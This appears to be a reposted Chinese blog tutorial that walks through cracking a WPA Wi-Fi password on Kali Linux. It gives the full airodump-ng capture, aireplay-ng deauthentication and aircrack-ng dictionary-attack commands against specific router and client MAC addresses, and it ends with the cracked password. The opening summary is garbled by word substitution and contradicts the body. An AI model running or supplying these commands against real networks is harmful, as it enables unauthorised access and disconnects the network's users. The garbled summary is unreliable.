龍之家族

引用網址：http://www.07net01.com/linux/2016/01/1146121.html

[摘要：那里我用的是 Kali linux 假造机，别的设置装备摆设了一个无线网卡，上面是详细步调： 1、上岸 Kali Linux 最好以root身份 2、把无线网卡接进 Kali Linux VMware下面击左下角小] 
 

这里我用的是 Kali Linux 虚拟机，另外配置了一个无线网卡，下面是具体步骤：

1、登陆 Kali Linux

最好以root身份

2、把无线网卡接入 Kali Linux

VMware下点击右下角小图标可将USB设备接入虚拟机中

3、查看接入的无线网卡，并关闭连接所有无线网卡

4、把无线网卡切换为监听模式

5、使用 airodump 命令定位附近所有可用的无线网络

6、一旦看到合适的目标则停止扫描（Ctrl+C）

7、复制目标网络的BSSID

现在，复制以下命令：

airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]

把[channel]替换成目标网络的频道，把[bssid]换成目标网络的bssid，把[monitor interface]换成监听模式的网卡名

完整的命令如下：

airodump-ng -c 6 --bssid 70:18:8B:DB:64:27 -w /root/Desktop/ wlan0

8、运行上述命令后，发现客户端已经出现在我们的网络中

9、再开一个终端，输入以下命令

aireplay-ng --deauth 2 –a [router bssid] –c [client bssid] wlan0

这里我们的命令完整如下：

aireplay-ng --deauth 2 -a 70:18:8B:DB:64:27 -c 64:5A:04:61:64:48 wlan0

10、运行上述命令后之前的那个终端显示出握手信号

然后我们Ctrl+C停止扫描，注意这个终端不要关闭

11、用密码字典破解无线网络，命令格式如下：

aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

这里我的命令是：

aircrack-ng -a2 -b 70:18:8B:DB:64:27 -w /root/wpa.txt  /root/Desktop/*.cap

12、查看破解结果

运行上述命令后如果密码在字典中则可以破解，否则无法破解，可以换一个密码字典

这里我们成功破解了密码 111111111